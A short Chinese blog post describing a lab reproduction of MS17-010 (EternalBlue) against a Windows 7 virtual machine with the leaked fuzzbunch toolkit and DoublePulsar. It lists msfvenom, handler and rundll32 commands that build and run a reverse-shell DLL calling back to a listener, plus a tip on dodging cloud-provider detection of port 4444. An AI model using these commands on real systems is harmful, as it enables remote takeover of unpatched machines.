美文网首页
[工具编写][漏洞研究]fuzzbunch复现MS17-010

[工具编写][漏洞研究]fuzzbunch复现MS17-010

作者: Rixo | 来源:发表于2022-06-27 16:46 被阅读0次

环境

VMware® Workstation 16 Pro
Microsoft Windows 7家庭普通版 Service Pack 1 32-bit 6.1.7601
Windbg Preview1.2206.19001.0

攻击机环境

Python 2.6
pywin32-212.win32-py2.6.exe
fuzzbunch
PS:由于msf中没有x86的攻击payload,所以使用最开始的泄露工具集做利用

  1. 下载fuzzbunch后,修改xml文件信息,同时新建一个listeningposts文件夹
  2. 靶机需要关闭防火墙

漏洞复现

  1. 运行fuzzbunch,然后新建一个项目
    python fb.py
  2. 使用永恒之蓝
    use Eternalblue
  3. 看到Win就是成功了,但是还无法使用shell交互,需要使用Doublepulsar模块加载dll
  4. 成功后会有个成功显示

PS:如果是vps的msf,不要使用4444端口,云服务商有检测。不要使用meterpreter的反弹shell,win7下反弹报错。

相关命令

  1. msf生成shell命令
    msfvenom -p windows/shell_reverse_tcp lhost=192.168.32.199 lport=8973 -f dll -o 8973.dll
  2. msf快速监听命令
    handler -p windows/shell_reverse_tcp -H 0.0.0.0 -P 8973
  3. windows下反弹dll命令
    rundll32.exe 8973.dll,0
    PS:x64环境下其实是可以使用x86的payload的

相关文章

网友评论

      本文标题:[工具编写][漏洞研究]fuzzbunch复现MS17-010

      本文链接:https://www.haomeiwen.com/subject/ffanvrtx.html